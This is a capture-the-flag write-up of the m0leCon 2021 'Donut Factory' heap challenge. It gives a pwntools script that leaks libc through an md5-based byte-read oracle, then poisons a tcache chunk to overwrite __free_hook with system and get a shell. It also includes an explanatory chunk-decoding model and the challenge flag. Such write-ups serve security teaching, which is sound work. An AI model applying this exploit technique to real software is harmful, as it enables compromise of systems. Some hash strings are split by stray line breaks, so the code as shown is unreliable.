Tags: craft heap fake_chunk 

[Link to original writeup](https://wrecktheline.com/writeups/m0lecon-2021/#donut_writeup)

# Donut Factory (15 solves, 263 points)
by FeDEX

```
Come visit our factory to create your custom donuts!

nc challs.m0lecon.it 1743

Author: Alberto247
```

This challenge provided two files: the `donut` binary and `libc-2.31.so`.
It is a simple menu-based challenge with the options to:
- Create donut
- Delete donut
- View donut
- Buy Donut
- Leave

Quickly reversing the program, we find that the `Delete` and `View` functionalities take unsanitized input, allowing us to perform those actions on arbitrary addresses.

The Delete method takes as input an address and frees it.
The View method takes as input an address and prints a donut based on the first byte.

Following this, I was able to generate every donut, store its hash in a table (indexed by the byte value it renders), and then use the table as a byte-read oracle to leak the libc pointer from a freed heap chunk.

```python
import hashlib
from pwn import *

# `p` is the pwntools tube to the challenge; it is opened elsewhere in the original script.
# `hashes` maps the md5 of each rendered donut to the byte value it encodes (its list index).
hashes = ["244b8911aae2f329311f6d6511bb3c3c","9e12b4534de7339be7c1c550e42193f4","3517d5c190d9891461f855833686ce02","31f807fd73e342128428d0446620c3cb","e4140bf37897507a4baf6b5a679d9919","70dadc8a305d5594fe42a71785d5a97b","6c1f3bfceb82675c409eb3a9a173592f","27f3bee48c0f41f8fb494fcc8048e919","550fee47562795ebda1ea957e02bda0f","c7b22166c88a40eccfcf8732499e40d1","79a490bd8bc95a9e447f1af1f272f59a","0e793dd64dfb6eeaed878d9dcfa021e3","535e39e5e031961bacd91a1a3e7aaf38","74aecbca921511a0fef7b9db6767795d","df77b317a2ffd306893ca4395cfa2811","0f3c26437382ce2d5cbc253ecf912966","157461a3d1de9805c73b53c36c9d1925","a4bf483f8b958d05d78beadc80ea95a3","c1e90ac302441cdcef82528d318d298a","c59a0fdbec6e95ce8543fe2c0588b199","878f4d8961abb07585eec52242ac5054","1c3c336e76c9f6f4204239d7d68fc0c7","92b72832a439731509cb2b19c5063526","362ca530322fa159c7597a533372b3bc","8507b0c24546f5fc10ebecd26ab718b6","491a700da38fb98b6183e6c18d3296be","6b07a7b8416c7275c973158ddaa7357d","a14b87d441f3a7e52a647328d3a503d2","0a3910b8ac25ae8bbb6a03346b64f04c","9bf2dc4b520f698f5df821b6bdda0832","c36d65dc3f8cbdc199fcdbc78a6adff3","1dfafd64239861ec8976219bb0589351","756c4c95eef6cf127ca47d9c582ffee0","13e206ff982d36e82117d80b7a485aa9","2266c15194b98c647e243461abe42fe3","6ded8fdc2381cce1592f8d09a4a95c3d","b5487c60d1224434444bfd9236c709c7","e1ffb5c58845ffc368069f2a5b217bb5","b1875b40d0a3f4306f3f35203d4f6e47","f76a9c9f0d7acd77ceae43edc5162a5c","91717e87f382ec3643028b82da8c60c0","2fae081d73db99dc269da9bf1d9ecf01","4195d602e0c4b7c9940aaf9f72d3a73a","3b66601aee65402d5034a3b853e59aae","617196e86d4bcf9d7764f30f24734978","781609ffbae6bd53efba2f8bef9bf354","018e0f642cbd14fab3583b11d3503366","d06ad4593071eab0c7a64ffc62b74d61","8566c56cb71bbb4501b6d0f7c33ffcc7","336d9786cde6ea8995193084a1d9535f","2296a95a8d5ed3d6a4a2a5d44b9d8752","a5d41c4efc1668ccd6f13489ee0b6962","db8129e49e38831e955b51722a82e5e9","4dae69a5b462ac042c25bd36d6834c10","ab8ea2d6ab74277e057096ad221e1b1b","7a1b732c62c27e44d58aa5c8b94a89b8","e7776912cf2d73fe9c0ed71bace54
68b","a08ba9655620bb8507da6439d64c8d43","a66e9a7140d86c5fb8ae912f432e298d","ee4e519a9c42a244621b16a02840d56f","9dd6f10f3ad48d0de2668e7b59818b7e","26a7195cff38401ec3a72b090bf50eaf","02fbe940ff64454bfd82de8a9b3626b9","61a65086a1da0342805f60b43ff0e03d","3f048d2ee699756f90530154808594ea","c3ad0b1059c7a0ed1254113b724591ad","522a994709b8fca96e5e981cabb655e5","aacd10c132ad192cfb94d3469dc35f24","f0d250a6a25cf33edbb19cc252899a19","408140dd3008b8da4b8378939a309f4a","0bc5c8454d5b3a1054df5d9c1ff38dc0","c91203b96d22b5cb3bdd3b27f0a1f111","e9e6233859c6f5b62532eb760e978178","0d82f46293df813946c1fd6bf159206c","ac448688a38d6f614366bb39cef03eef","93dc00ec08dfb66919f25671523fe612","47f21e690538237b94eeac2ca98ee0b7","088b6256948a64e0f1643be6b072b159","ea01cec409b620a60319291540f614d7","6d25b193f750efba5cd08b2769c0e3a7","4f6b299178369d1ee12b92d9e828bacf","61345b477c5597926af5e6bf36ce0e0a","52aef517cfc57a654ed230ca4c1362d7","c8c204a854409da700158526cae62435","e1cdd4d5caf77c6f3fec87214f5bb9dc","145c3c25998a15749519818bb89c135f","438b5dd73f94a5c5d0d0362ad4a66e6c","46f3a1705af1ebf4d9859b188684fd8a","0475d66adb47f2d47d76c3332b10b7c9","7cfcd6c4d5ad54026e9f537d38b9f59e","039b2e616cc311f44aadfa0c87160883","7cdef375044f36af43db571769536bdf","b1e1b4eead9587bbdff13bf15d197533","7bfb237b4b335c973f3bf7a6dd1cbd32","20dce478a13cec86b93d91a279053fba","33dd8cc72e018ff1c072aa44094b24ca","5ec3331b69725074c0c0774d64275e1f","e6e1729ff202433d82a9a79db3dfbac3","fb75b8d513aeba8a8f77d68f22f99815","b72b90a296d09822fda435208351d399","0186368abd0b3cd1971eb92b22dfa891","240d0624a58b37c76c1c30142ae20c20","1b6986d19e2920b8969eda71c0f06f23","6335c0e4d544e951618e0a2391615620","d882120924e914555016ee516ef8b1f6","5dd36739c264232ce517ef30c69e4020","d44d13f74c644c393daddc806b8effb6","0b347e6704a266e42c74463932e6887c","beec5ab4565cbe1f913a0653234bf996","6f4a0772195bcee71e6554e5e6d06178","256761ab9ec28964531955bad1689db0","8aa2a07a1b6b26dc492110b225e74fa0","cdfc4702005dd5ee08b8fba5400efef2","171582347945021b955f3d9f4bbc3d19",
"287ec05f16189f349e71e8f5739ff576","cab56c9f5311d74d1716958867abea24","8da48008d6411218ea86ed8d4b2ed3b6","08748849f4347c106f18af768eda9004","d329133ebcfedcc025fde1bf438e3d9f","61c5dd9b0ef3e9193a0b76d0605d8325","ca1bd76a428edc0571f6d4d025c0e5f1","e67f49d0be0c1ca3d15b75ad59dc5286","fba5d4915b188ca14ac29ec613899cdb","a299f56e65ddbadddda8b42d2b2358de","dc295a6371c3612cef283a27e116791d","d2d94c386c355e79016d0c34f7964048","eb6a00da275608fcc6e494bf14ed9a42","8003b4a3745233792a8a64f888b05281","1772180f1b6921354b1dfa2a9287260c","88473fd94b8e70ad46024b443e87e2fe","1b943cbe2b15cfe4fd866cd012912bd0","87e828501e6b82215d52da376fd9eb07","c44673531799a2de7b0344db39c4f1ae","feb0de99e0148fb89301457d8d6183dd","c3ae1a82c5fffb46653ade9aef3374cd","332370cce096416a199132f81c552604","d15a6f84d8176e910e145e9c94888dce","8e7178b0f0bbb42ccdcccfaddff5905e","d6e3c4db0a910736229919317e460925","9bdeea65860ab7ff1b7dba1b93446ccc","d1c82eff6118130af4adfb52963c5d1b","11d2601eab00b6462a39c43012846ab2","f177cef6b70774d36191cc2da5f48a76","3c439c9fd851c489d7e1527ede816560","de7d6a7ecd141bc6cba721b237d5fea4","90294a9ce3e7b02fbe2997e8ea378dff","d72e0b774f76bd6a3ddb823968d217c8","3d5ae0ef52e6f12e2378e83dd45c5b8f","9d72ce79bbaf8aef05d0350203b8da06","81be16218ee6c266773294a0d02d294e","addb2903ff8275d2bcd46ff8308b8e6b","645dbaeaa7dc933079a296bb8f66e083","f374e5a0b750056d00b89bb164970801","de10e4eb59b089d87598ce38f3c2fc9e","9d1bc9288c95a4ea889f437e61e79a15","543fc78ee3d8759c6eec584b7266faca","364d6362838a2b0de8e6482b2be88cc5","7d035f1bbc2f87fc1ccb9166d34f9a24","52eaa4aaed9202a8d4eeced5892af249","523d690bdf5e456e87f8c5a02c6ef0ce","8950b6981b82d6dda8aeb8d58adc9ada","0c5b179b055218ca10675b595b8d25aa","59c8e341cd9f3ebbd53182796506b442","fb04215e976e21486539fca63a559b64","a81861b0313a41d3084fd59da58b6ddf","2578adf8096e9054d7b248b8a8f361cf","33bd9ed361d6132fa027a613d8520bfc","c50bfa8726fd0c941fa49b5c99d2ea0d","154ca97762c31f6dce7aab2fd2dd4464","1c9a10afedd053493cd769d6d285506e","a3c47ecf4e1641a8db7bccb8e94e59c1","0129
385b79426e13e24b750fb251b914","7e2daf44701c1356daf09c3fda75043b","e5846a457cc491683b53104df2021bf5","f8df3f2920d49cb3b86c3cb5cca04712","8f6362a7798ac335e5a725093abd06cc","e20d227b4ce6fcc76b8f0c76f6684bea","d7e3a97da001f59263643eb17d017cc8","be8a8dd440b697fac03061912c4021a8","22b001b903ba17c611ba4ed52477ca6b","db89bfdce129d88cf9e0cb7d9fc5c46f","e7769723f8fdbe76e2e1c48d7cddec5e","da3cf19ff1f5ca7fca088ab389b5cff0","0c2887a59682f19aab3012494db3484c","4edd35d8cde21b9695617b1f94076139","af55970f88c5e52a422aeb4b848a7087","77fa572655440cd82db5d42f9e30ca05","6e7a56bf66a07ac42b9a70df1cdac57b","c8652795213654feef519aedafab549c","0269d4b55b3ca1e8db252acf43db1b25","c8da711c93da6f0bd012a46e02c8a391","e00133726009504cbdb9d1697aaad05a","beebc3290e9050f4c8b405a673bb62d6","a1371bbc45894596125c34d9c8515036","ffc2fd64411bd8dc04496505e626bb29","4fe7b41fe37089cf722145b3ab53fd72","042b93b8286f628b5e8083765c4d4a1f","aa775b01118dd41e733ba2d3f3c4bd30","c3e5d248b0ac1c4f5063c4addfe56be9","ee7048a5e23dadd613a556da013dc9f9","88a8935ed4c82c20b1a0e6a02b94c432","7b24d486674fae9f9d182c134a61c4c0","a6af33e066c780b6710518306e2a8ddd","a00b87e316e14a41c8d7988b332ff954","904319188297d0dfed6533c65a4f20bc","44546db5a37f8666a5f5655965dc158a","afe67c388dd12a4943474784be62bf80","e71b8c06fef88758efbfaf0542c18f32","af35dc9ba30af53ab082be2cd763eb2f","87a6a01ec8948d48e7413e6c815e979e","49b44342c19f4d8c5ac214b82ca18d01","d8d8aea73fa72f2c98e7b3b0b5889b6b","4a442985c50d13c3b233b75c93de4595","8a51916019777fb7008318bb0221c6c8","8e53f8838d46fe4aa7e2a89a52f662db","85bb6f314c12f7d74bd62e03215b9153","f276a64fb37fc07c3eed642888332ccd","3d2619f673af2595277601d548059664","2cdfffa1cce47a0f1c103d98010775c3","15acbc1221bf58d5ad7571a8eb35d773","8a1392816509e0ebc42e5bd50792b6a8","73213ef32093bdd8867cbbf3ff4b5c43","24427f6f2e5e3aea08df2d5d04eb31e3","38a2dee8cae9d297855196b48521a774","e322e8836d30fcede0bc4599460570a0","f14b95c1bdd3cdb1f16cd4b03cae42c6","4e74b4d448035455b6da485e99b47a8b","5a889cd08e4bc55319a65aa9a7a75508","c4670d041
7bca5fed0568452d4475f2d","99be610f21f7b712164c24d8732abd76","83376b59ba424dd3fb0456801961e107","668c1d8e62bc292ce1ef5b709ea8994f","ea6c08b34f228e10ad5157cd5b550fbe","73a6b98c64c9547fe077ba4d011dbccc","7a50f50ac2b1343aa74b2fcf26fb7a4b","e81b1e29982f3f8dab744b9de6ed3f07","75835b858eac15248772f39fc53eb34d","250bdeb6439df36461c0dd11629735f9","ef88c3e74d9b0e6b8ae895e16a15ba98","fbf35ddef33e6c567b81c6a77023e8d3","537ea975260d29ad418ef4184878d83d","60fe12c00a765af59fba90a2325dd694","aa9126aaa343a4703dd40521f2a4f919","56cb90f8d1c1cf2185c458b3915eaf77","6a9681d9d671b9e8e2b9279db93b9cc0","1826d982863eb441f0f944fff375d459","8d3c19a937665f89faf84f4d5dca8fc5","df95a4ad9a93d9fcb3c8cde5c21919b9","f8172e59c358e958e80ae6cdfaf98cd0","d1ddbe82b534adc606f2c7880bca473a","c6315d205043074b6e24c99678bb8606","db27f5b7975fc23bfb84c769d7da12f5","1ae3ecadf02d6c1ba26b15f92bad611d","8d887a9262277858be3c2cee9f7fc1df","48270138b22931afc183a62e1d77061f","a348d1e3cb8fc29f45650d8e6727d5b5"]

def leak_byte(ptr):
    """Use the unsanitized View option as a one-byte read oracle:
    render the donut at `ptr` and look its md5 up in the table."""
    p.sendlineafter('factory\n', 'v')
    p.sendlineafter('!', hex(ptr))
    donut = p.recvuntil('We')
    final_donut = donut.split(b'\x1B')[-1]   # keep only the text after the last ANSI escape
    to_hash = final_donut[:-2] + b"Do"       # drop the matched 'We' and append 'Do' to match the table
    hashed = hashlib.md5(to_hash).hexdigest()
    return hashes.index(hashed)

def leakqword(ptr):
    """Read 8 consecutive bytes and return them as a raw string for u64()."""
    value = ''
    for i in range(8):
        tmp = leak_byte(ptr + i)
        value += chr(tmp)

    return value
```

Once I had the heap leak (given by the program) and the libc leak, I was ready to craft a fake chunk inside a big chunk, free it, corrupt its `fd` pointer, and then obtain a chunk over `__free_hook`.
After that, upon freeing a chunk with `"/bin/sh"` a shell was triggered.

Exploit:
```python
# `create(type, size, data)` and `destroy(addr)` are menu wrappers defined elsewhere
# in the original script; `create` returns the address of the new donut as a hex string.
if __name__ == "__main__":

    ################################## EXPLOIT

    xx = create(1, 0x30, '/bin/sh\x00\x0a') # chunk used to trigger shell

    d1 = create(1, 0x800, 'A'*10+'\x0a') # use to leak heap and libc
    heap_base = int(d1,16)-0x16c0
    print 'HEAP >>',hex(heap_base)

    d2 = create(1, 20, 'A'*10+'\x0a') # avoid consolidation

    print 'DESTROYING >>',d1
    destroy(int(d1,16))

    leak = leakqword(int(d1,16)) # leaking libc
    leak = hex(u64(leak))

    libc_base = int(leak,16)-0x1ebbe0
    print 'LIBC >>',hex(libc_base)

    d1 = create(1, 0x800, 'A'*10+'\x0a') # remove big chunk from unsorted

    craftx = create(1, 0x68-2, 'ffff\n') # tmp chunk
    craft1 = create(1, 0x200-2, '\x00'*7 + p64(0)*2 + p64(0x70) + '\n') # allocate chunk to hold fake chunk
    print 'CRAFT >>', craft1
    destroy(int(craftx,16)) # free tmp chunk
    destroy(int(craft1,16)+0x20) # free fake chunk
    destroy(int(craft1,16)) # free big chunk

    craft = create(1, 0x200-2, 'X'*7 + p64(0)*2 +p64(0x70) + p64(int(libc_base)+0x1eeb28-8)*3 + '\n') # reallocate big chunk and corrupt fake chunk's fd

    create(1, 0x68-2, 'Y'*0x18 + '\n')
    create(1, 0x68-2, 'Z'*7 + p64(int(libc_base)+0x0000000000055410) + '\n') # get chunk over free_hook and overwrite with system

    destroy(int(xx,16)+1) # trigger shell

    p.interactive()
```
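To see why the fake chunk is freed at `craft1+0x20` and why a 0x68-2 request later returns it, the following added example (not part of the original writeup) models the donut's user data and decodes it the way glibc 2.31's `free()` would. It assumes, as the `+0x20` and `+1` offsets in the exploit suggest, that `create` stores one type byte before the user-supplied data; the glibc constants are from the glibc source, not from the page.

```python
import struct

# glibc 2.31 x86-64 malloc constants (from the glibc source, not from the writeup)
MALLOC_ALIGNMENT = 0x10
MIN_CHUNK_SIZE = 0x20
SIZE_BITS = 0x7            # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA
TCACHE_BINS = 64           # chunk sizes 0x20..0x410 go to tcache

def p64(v):
    return struct.pack('<Q', v)

def u64(b):
    return struct.unpack('<Q', b)[0]

def request2size(req):
    """User request -> chunk size, rounded the way glibc does it."""
    return max((req + 8 + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1), MIN_CHUNK_SIZE)

def tcache_idx(chunk_size):
    """csize2tidx(): the tcache bin a chunk of this size lands in."""
    return (chunk_size - MIN_CHUNK_SIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

def free_accepts_size(chunk_size):
    """Size sanity checks free() runs before it trusts a chunk header."""
    return (chunk_size >= MIN_CHUNK_SIZE
            and chunk_size % MALLOC_ALIGNMENT == 0
            and tcache_idx(chunk_size) < TCACHE_BINS)

def donut_payload(fake_size, fd=0, filler=b'\x00'):
    """Model of the user data written by create(): an assumed 1-byte type
    prefix, 7 filler bytes, two zero qwords, the fake size field and fd x3."""
    return b'\x01' + filler * 7 + p64(0) * 2 + p64(fake_size) + p64(fd) * 3

def chunk_at(user_data, user_off):
    """Decode the chunk header glibc would read for a pointer at user_off."""
    hdr = user_off - 0x10
    raw = u64(user_data[hdr + 8:hdr + 16])
    return {
        'prev_size': u64(user_data[hdr:hdr + 8]),
        'size': raw & ~SIZE_BITS,
        'flags': raw & SIZE_BITS,
        'fd': u64(user_data[user_off:user_off + 8]),
    }

if __name__ == '__main__':
    data = donut_payload(0x70, fd=0xdeadbeef)   # constructed sample fd value
    c = chunk_at(data, 0x20)
    print('fake chunk @+0x20: size=%#x bin=%d accepted=%s fd=%#x'
          % (c['size'], tcache_idx(c['size']), free_accepts_size(c['size']), c['fd']))
```

With the assumed prefix the size field sits at user offset 0x18, so the pointer at +0x20 has a well-formed header of size 0x70, the same bin that a `0x68-2` request maps to, and `xx+1` skips the type byte so the freed pointer starts at `/bin/sh`.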

- flag: `ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}`

Original writeup (https://wrecktheline.com/writeups/m0lecon-2021/#donut_writeup).